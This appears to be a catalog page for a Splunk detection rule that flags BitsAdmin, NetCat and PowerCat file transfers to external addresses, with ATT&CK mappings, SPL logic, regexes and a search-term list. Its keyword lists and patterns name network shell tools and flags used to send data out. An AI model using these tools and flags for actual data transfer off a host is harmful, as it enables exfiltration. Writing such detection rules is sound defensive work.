Detection rules › Splunk
BitsAdmin NetCat PowerCat File Transfer (Windows Event Log)
This use case is searching for specific keywords that are generated when a file transfer using Bitsadmin, Netcat or PowerCat is made to send data to/from an external source
MITRE ATT&CK coverage
| Tactic | Techniques |
|---|---|
| Execution | T1197 BITS Jobs |
| Persistence | T1197 BITS Jobs |
| Stealth | T1197 BITS Jobs |
| Command & Control | T1071.002 Application Layer Protocol: File Transfer Protocols |
Event coverage
| Provider | Event | Title |
|---|---|---|
| Security-Auditing | Event ID 4688 | A new process has been created. |
Rule body yaml
id: '1067.1102'
title: BitsAdmin NetCat PowerCat File Transfer
description: 'This use case is searching for specific keywords that are generated
when a file transfer using Bitsadmin, Netcat or PowerCat is made to send data to/from
an external source. -- Threat Actor Association: Cadet Blizzard - Software Association:
Black Basta -- Atomics T1105 Test #9'
logic_format: Splunk
logic: '`get_endpoint_data` `get_endpoint_data_winevent` (("/transfer" OR "/addfile"
OR "Start-BitsTransfer" OR " -vw " OR " -vn " OR " -vwn " OR " -vnw " OR " -w "
OR " -wv " OR " -wn " OR " -wvn " OR " -wnv " OR " -N " OR " -Nv " OR " -Nw " OR
" -Nvw " OR " -Nwv " OR " --send-only") OR ("nc64" OR "nc32" OR "netcat64" OR "netcat32"
OR "ncat" OR "nc" OR "netcat")) | regex process="(\s+\-[Nvw]+\s+\d+?.*?(((\d{1,3}\.){3}\d{1,3})|(\w?\wtps?\:(\/\/|\x5c\x5c)))\s+\d{2,5})|(?i)((ncat|nc|nc64|nc32|netcat64|netcat32|netcat)(\s+|\.exe).*?\-[Nvw]+\s+\d+?.*?(((\d{1,3}\.){3}\d{1,3})|(\w?\wtps?\:(\/\/|\x5c\x5c)))\s+\d{2,5})|(\s+\/(transfer)\s+.*?\w{3,5}\:\/\/)|(?i)(--send-only\s+?$)|(?i)(Start-BitsTransfer)|\s+\/(addfile)\s+"
| rex field=process max_match=1 (?<dest_ip>"\s+((([a-f0-9:]+:+)+[a-f0-9]+)|((\d{1,3}\.){3}\d{1,3}))\s+")|
rex field=dest_ip mode=sed "s/([\n|\r|\s])//g" | table _time, host, user process,
process_*, parent_*, dest_ip | bin span=1s | stats values(*) as * by _time, host
| search NOT dest_ip IN(10.0.0.0/8, 127.0.0.0/8, 169.254.0.0/16, 172.16.0.0/12,
192.168.0.0/16, 224.0.0.0/4, 255.255.255.255, "::1", "FE80::/10", "FF00::/8") '
techniques:
- command-and-control:application layer protocol:file transfer protocols
- persistence:bits jobs
- defense-evasion:bits jobs
technique_id:
- T1071.002
- T1197
data_category:
- Windows event logs
references: null
Stages and Predicates
Stage 1: search
search source="*" source IN ("WinEventLog:Security", "XmlWinEventLog:Security")
Stage 2: regex
regex match(process, "(\s+\-[Nvw]+\s+\d+?.*?(((\d{1,3}\.){3}\d{1,3})|(\w?\wtps?\:(\/\/|\x5c\x5c)))\s+\d{2,5})|(?i)((ncat|nc|nc64|nc32|netcat64|netcat32|netcat)(\s+|\.exe).*?\-[Nvw]+\s+\d+?.*?(((\d{1,3}\.){3}\d{1,3})|(\w?\wtps?\:(\/\/|\x5c\x5c)))\s+\d{2,5})|(\s+\/(transfer)\s+.*?\w{3,5}\:\/\/)|(?i)(--send-only\s+?$)|(?i)(Start-BitsTransfer)|\s+\/(addfile)\s+")
Stage 3: rex
rex field=process ... -> dest_ip
Indicators
Each row is a field, operator, and value that the rule matches. The corpus column counts how many other rules in the catalog look for the same combination: high numbers point to widely-used, community-vetted indicators. Blank or 1 shows that the indicator is specific to this rule.
| Field | Kind | Values |
|---|---|---|
process | regex_match |
|
Search terms
Bare-string tokens in the SPL search body. Splunk matches each token against _raw (the untyped raw event text) anywhere it appears, not against a specific field. These don't surface in the Indicators table because they aren't predicates on a known field.
| Stage | Term |
|---|---|
| 1 | "/transfer" |
| 1 | "/addfile" |
| 1 | "Start-BitsTransfer" |
| 1 | " -vw " |
| 1 | " -vn " |
| 1 | " -vwn " |
| 1 | " -vnw " |
| 1 | " -w " |
| 1 | " -wv " |
| 1 | " -wn " |
| 1 | " -wvn " |
| 1 | " -wnv " |
| 1 | " -N " |
| 1 | " -Nv " |
| 1 | " -Nw " |
| 1 | " -Nvw " |
| 1 | " -Nwv " |
| 1 | " --send-only" |
| 1 | "nc64" |
| 1 | "nc32" |
| 1 | "netcat64" |
| 1 | "netcat32" |
| 1 | "ncat" |
| 1 | "nc" |
| 1 | "netcat" |